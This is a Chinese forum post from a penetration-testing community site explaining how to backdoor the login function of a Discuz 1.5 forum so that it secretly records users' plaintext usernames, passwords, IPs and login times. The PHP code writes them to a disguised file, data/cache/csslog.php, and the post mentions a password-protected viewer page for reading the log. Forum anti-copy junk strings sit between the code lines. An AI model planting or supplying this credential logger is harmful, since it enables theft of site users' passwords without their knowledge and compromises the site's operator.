中国网络渗透测试联盟
标题:
dz1.5记录用户名和密码
[打印本页]
作者:
admin
时间:
2013-2-27 21:40
标题:
dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
* H7 v! q0 w$ i: T8 c' o
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
8 S- \& L5 n. X4 u2 t9 R8 `
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
( @4 l7 `/ R! y6 ?3 D
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
, W: Y9 e1 ~" A4 p! p0 w6 M8 G* x
if(getenv('HTTP_CLIENT_IP')) {
4 J+ @9 W0 t) E& v+ |6 d
$onlineip = getenv('HTTP_CLIENT_IP');
, D2 S/ ^# R, Q! [ L
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
) u9 f, \: m- x8 D
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
0 p+ w8 M8 ~2 O7 f( h( A/ T
} elseif(getenv('REMOTE_ADDR')) {
# [/ u! X, K& g7 O4 j0 R
$onlineip = getenv('REMOTE_ADDR');
1 F4 A8 W, D& `8 ]* d1 m
} else {
5 U# u5 A0 h" k9 \* j# S
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
8 o( ]' f- N1 R
}
( I+ M! ]7 [& [3 N0 j N% P! x. j
$showtime=date("Y-m-d H:i:s");
& t2 W5 K/ x- ~1 g( ^7 b
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
6 j/ w9 q" m4 O6 X
$handle=fopen('./data/cache/csslog.php','a+');
1 d" H4 k a* V2 k* C# m
$write=fwrite($handle,$record);
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2